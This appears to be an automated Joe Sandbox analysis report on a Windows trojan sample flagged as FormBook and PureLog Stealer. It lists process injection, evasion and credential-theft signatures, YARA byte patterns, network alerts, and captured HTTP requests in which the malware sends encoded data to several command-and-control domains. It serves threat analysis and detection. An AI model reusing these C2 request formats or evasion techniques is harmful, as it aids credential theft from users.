Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dGHiTqj3AB.exe

Overview

General Information

Sample name:dGHiTqj3AB.exe
renamed because original name is a hash value
Original sample name:1f5c95d40c06c01300f0a6592945a72d.exe
Analysis ID:1483009
MD5:1f5c95d40c06c01300f0a6592945a72d
SHA1:79a217ed19833efcf640ffd8bb04803e9f30d6f4
SHA256:434ec59b680788bae7f2935200a77e681cecbb517d853c6e6cf31f4cf112e5cc
Tags:32exetrojan
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • dGHiTqj3AB.exe (PID: 7512 cmdline: "C:\Users\user\Desktop\dGHiTqj3AB.exe" MD5: 1F5C95D40C06C01300F0A6592945A72D)
    • dGHiTqj3AB.exe (PID: 7784 cmdline: "C:\Users\user\Desktop\dGHiTqj3AB.exe" MD5: 1F5C95D40C06C01300F0A6592945A72D)
    • dGHiTqj3AB.exe (PID: 7792 cmdline: "C:\Users\user\Desktop\dGHiTqj3AB.exe" MD5: 1F5C95D40C06C01300F0A6592945A72D)
      • fgebfePlJm.exe (PID: 2416 cmdline: "C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • mcbuilder.exe (PID: 8180 cmdline: "C:\Windows\SysWOW64\mcbuilder.exe" MD5: CAE8E531CD82401A9ECB4C446CBB964B)
          • fgebfePlJm.exe (PID: 5580 cmdline: "C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7288 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1754732124.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2ec33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x176e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2b9d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x1447f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        Click to see the 14 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.dGHiTqj3AB.exe.72b0000.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          0.2.dGHiTqj3AB.exe.2cf513c.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0.2.dGHiTqj3AB.exe.2cf513c.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.dGHiTqj3AB.exe.72b0000.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                3.2.dGHiTqj3AB.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                  Click to see the 3 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  No Snort rule has matched

                  Suricata Signatures

                  Timestamp:2024-07-26T13:58:07.135377+0200
                  SID:2855464
                  Source Port:49762
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:10.036735+0200
                  SID:2855464
                  Source Port:49745
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:35.005440+0200
                  SID:2855464
                  Source Port:49752
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:12.627565+0200
                  SID:2855464
                  Source Port:49746
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:56.269959+0200
                  SID:2855465
                  Source Port:49759
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:24.070738+0200
                  SID:2855464
                  Source Port:49749
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:58:16.188839+0200
                  SID:2855464
                  Source Port:49764
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:58:19.218798+0200
                  SID:2855464
                  Source Port:49765
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:56:15.151948+0200
                  SID:2022930
                  Source Port:443
                  Destination Port:49741
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:51.120537+0200
                  SID:2855464
                  Source Port:49757
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:48.598378+0200
                  SID:2855464
                  Source Port:49756
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:58:01.968155+0200
                  SID:2855464
                  Source Port:49760
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:58:27.994998+0200
                  SID:2855465
                  Source Port:49767
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:21.514806+0200
                  SID:2855464
                  Source Port:49748
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:56:46.525961+0200
                  SID:2855465
                  Source Port:49743
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:42.778805+0200
                  SID:2855465
                  Source Port:49755
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:26.659151+0200
                  SID:2855464
                  Source Port:49750
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:07.403866+0200
                  SID:2855464
                  Source Port:49744
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:37.598909+0200
                  SID:2855464
                  Source Port:49753
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:53.745534+0200
                  SID:2855464
                  Source Port:49758
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:29.248423+0200
                  SID:2855465
                  Source Port:49751
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:55:36.931527+0200
                  SID:2022930
                  Source Port:443
                  Destination Port:49735
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:58:21.796033+0200
                  SID:2855464
                  Source Port:49766
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:58:09.696547+0200
                  SID:2855465
                  Source Port:49763
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:15.383180+0200
                  SID:2855465
                  Source Port:49747
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:58:04.542850+0200
                  SID:2855464
                  Source Port:49761
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T13:57:40.170047+0200
                  SID:2855464
                  Source Port:49754
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 3.2.dGHiTqj3AB.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.dGHiTqj3AB.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3492992987.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2264611220.0000000001770000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.3492695958.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3492771051.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.3492876557.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2266277321.0000000002810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for sample
                  Source: dGHiTqj3AB.exeJoe Sandbox ML: detected
                  Source: dGHiTqj3AB.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: dGHiTqj3AB.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: mcbuilder.pdbUGP source: dGHiTqj3AB.exe, 00000003.00000002.2264388957.0000000001478000.00000004.00000020.00020000.00000000.sdmp, fgebfePlJm.exe, 00000007.00000002.3492316310.00000000006D8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: amWV.pdb source: dGHiTqj3AB.exe
                  Source: Binary string: amWV.pdbSHA256 source: dGHiTqj3AB.exe
                  Source: Binary string: mcbuilder.pdb source: dGHiTqj3AB.exe, 00000003.00000002.2264388957.0000000001478000.00000004.00000020.00020000.00000000.sdmp, fgebfePlJm.exe, 00000007.00000002.3492316310.00000000006D8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fgebfePlJm.exe, 00000007.00000000.2188191018.000000000092E000.00000002.00000001.01000000.0000000C.sdmp, fgebfePlJm.exe, 00000009.00000000.2469561771.000000000092E000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: wntdll.pdbUGP source: dGHiTqj3AB.exe, 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000003.2272383475.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000003.2264431609.00000000034F4000.00000004.00000020.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: dGHiTqj3AB.exe, dGHiTqj3AB.exe, 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, mcbuilder.exe, mcbuilder.exe, 00000008.00000003.2272383475.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000003.2264431609.00000000034F4000.00000004.00000020.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_030AC410 FindFirstFileW,FindNextFileW,FindClose,8_2_030AC410
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 4x nop then xor eax, eax8_2_03099B20
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 4x nop then mov ebx, 00000004h8_2_03BB04E8
                  Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /sg0d/?r4HtI=inDHeTS0D6JHi&bPD=ZFII8SVAvGzgMmVXT4ZY+5svGFARRAPMY6hEAWMgzd/rbIPLPNZ+nr66isGJwkaWRyig0DUujo2cMsRd49nDMp6VdguE/ogC4VFXU40D/gpWgkUbHmnCm4E= HTTP/1.1Host: www.accelbusiness.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                  Source: global trafficHTTP traffic detected: GET /x10g/?bPD=AtIpZIbrclbIO3wVVorP/+4YW7XwgThFYZcx/yn27KMXet/sCHbTQiCzWIx6Kv/NnE9nJScnuF31JPyJpxVQ15qsd8YhwJ4GP0n6fMl4YdtRcYZTZezTcHY=&r4HtI=inDHeTS0D6JHi HTTP/1.1Host: www.bosonserver.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                  Source: global trafficHTTP traffic detected: GET /5gvb/?r4HtI=inDHeTS0D6JHi&bPD=/cc9D7vqfViixqGthyicdvN6zULLmywOC8ezpB4FmcTpRtjTbyPN+qyyn2oVZVAAZJsSw+aEzq+oGUOxhiKfxK7cUWDoBkvPGfZgrhOxmX7AStJyIMBk2Ik= HTTP/1.1Host: www.hourglasspoise.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                  Source: global trafficHTTP traffic detected: GET /34b9/?bPD=W6RiSnxSk7sWUyAWv8iRSiD0PbjPvpVwUriP78iMWJLg9pjq2qbXqPDPIc9Rf4jTN/ETygayReM86N3bYDrSkNDIFOCHTFVOdGC1q9B2gGW6d9vv3KfEEgs=&r4HtI=inDHeTS0D6JHi HTTP/1.1Host: www.asymtos.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                  Source: global trafficHTTP traffic detected: GET /ukrf/?bPD=F/tpX3aJNzQcZIorwLh3+lvUFPUZ/CrYoWsqF027uxYn9zYWtTXD7TxpBDgZUhfyO+VwBO4Do9/nXXxf/u2OALcIo7otd0ARGQzWw/PbAY7nMJoOO6tnPWI=&r4HtI=inDHeTS0D6JHi HTTP/1.1Host: www.lontos.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                  Source: global trafficHTTP traffic detected: GET /6fdz/?bPD=Oie1FXKEyOqxuNWWyzkYdPfZReRkcG0Z1Eay2KtVdEC34I4dz//PHzzr4ve1tSfSRt9M/nPWu6bDrMp0Hm7HeQWrGZPcmCLmPnl5GlJrMre+ojzyhGOYA5A=&r4HtI=inDHeTS0D6JHi HTTP/1.1Host: www.theiconsummit.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                  Source: global trafficHTTP traffic detected: GET /5pdf/?r4HtI=inDHeTS0D6JHi&bPD=Ej/EzQPepC1y7H/CB3fFjxmxT5K/uokQyhXQpBVK3nqnb8oYKZIShVAN8OJA1iYy8omWkznWlYUMQWoQrGGIZe4YpIxUtk1QZkVuvgrHNfuUWu/hH7rCDC0= HTTP/1.1Host: www.accessoriestechbd.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0
                  Source: global trafficDNS traffic detected: DNS query: www.accelbusiness.net
                  Source: global trafficDNS traffic detected: DNS query: www.bosonserver.net
                  Source: global trafficDNS traffic detected: DNS query: www.hourglasspoise.net
                  Source: global trafficDNS traffic detected: DNS query: www.asymtos.tech
                  Source: global trafficDNS traffic detected: DNS query: www.lontos.top
                  Source: global trafficDNS traffic detected: DNS query: www.theiconsummit.life
                  Source: global trafficDNS traffic detected: DNS query: www.accessoriestechbd.com
                  Source: unknownHTTP traffic detected: POST /x10g/ HTTP/1.1Host: www.bosonserver.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Content-Type: application/x-www-form-urlencodedContent-Length: 200Cache-Control: no-cacheConnection: closeOrigin: http://www.bosonserver.netReferer: http://www.bosonserver.net/x10g/User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0Data Raw: 62 50 44 3d 4e 76 67 4a 61 2b 53 75 63 52 4c 45 4f 48 41 4e 5a 70 66 54 30 73 34 54 52 37 72 6e 30 53 6f 54 66 4a 68 2f 6e 44 76 34 77 34 52 71 52 70 54 35 49 47 4b 56 64 68 2f 65 56 39 70 58 4a 4b 69 4e 34 69 4d 6b 58 42 38 6e 70 31 69 4c 4a 76 4f 6d 32 32 31 6d 30 74 54 72 50 38 63 79 34 5a 67 4c 41 33 2b 75 65 4f 31 44 59 39 52 4b 61 59 59 49 56 63 4f 69 44 58 6f 74 75 55 65 65 63 33 7a 30 71 41 70 30 76 6e 58 4c 79 59 67 51 32 36 41 36 31 31 66 4f 76 6e 51 30 47 37 65 37 49 48 51 46 65 5a 47 2f 79 47 75 49 48 45 46 59 32 74 64 4a 2b 66 66 78 73 56 54 38 69 4b 2f 42 55 31 73 73 30 67 3d 3d Data Ascii: bPD=NvgJa+SucRLEOHANZpfT0s4TR7rn0SoTfJh/nDv4w4RqRpT5IGKVdh/eV9pXJKiN4iMkXB8np1iLJvOm221m0tTrP8cy4ZgLA3+ueO1DY9RKaYYIVcOiDXotuUeec3z0qAp0vnXLyYgQ26A611fOvnQ0G7e7IHQFeZG/yGuIHEFY2tdJ+ffxsVT8iK/BU1ss0g==
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:57:48 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:57:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:57:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
